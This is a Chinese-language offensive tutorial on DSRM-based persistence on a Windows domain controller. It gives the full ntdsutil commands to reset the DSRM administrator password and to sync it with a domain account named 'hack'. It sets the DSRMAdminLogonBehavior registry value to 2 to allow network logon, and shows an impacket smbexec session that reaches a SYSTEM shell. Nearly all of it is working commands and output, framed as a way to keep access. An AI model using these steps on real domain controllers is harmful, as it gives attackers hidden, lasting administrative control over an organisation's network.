目录还原模式DSRM是Windows域控的安全模式启动选项,DSRM的用途是运行管理员在域环境出现崩溃时还原、修复、重建活动目录,DSRM账户其实就是域控上的本地administrator账户。
默认情况下,DSRM账户无法用于RDP或远程连接域控。
DSRM很少会被修改,所以可以通过修改DSRM密码且修改DSRM登录方式来维权。
一、DSRM攻击
1、修改DSRM密码
域控上执行,修改DSRM密码
C:\Users\Administrator.SEC\Desktop\x64>ntdsutil
ntdsutil: set DSRM password
Reset DSRM Administrator Password: reset password on server null
Please type password for DS Restore Mode Administrator Account: *********
Please confirm new password: *********
Password has been set successfully.
Reset DSRM Administrator Password: q
ntdsutil: q
C:\Users\Administrator.SEC\Desktop\x64>
修改DSRM登录方式
PS C:\Users\Administrator.SEC\Desktop\x64> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\LSA\" -name "DSRMAdm
inlogonbehavior" -value 2 -propertyType DWORD
DSRMAdminlogonbehavior : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : LSA
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
验证
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/smbexec.py WIN2016-DC2/administrator:"Az123456@"@10.10.4.7
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
2、为DSRM同步指定域用户的密码
C:\Users\Administrator.SEC\Desktop\x64>ntdsutil
ntdsutil: set DSRM password
Reset DSRM Administrator Password: sync from domain account hack
Password has been synchronized successfully.
Reset DSRM Administrator Password: q
ntdsutil: q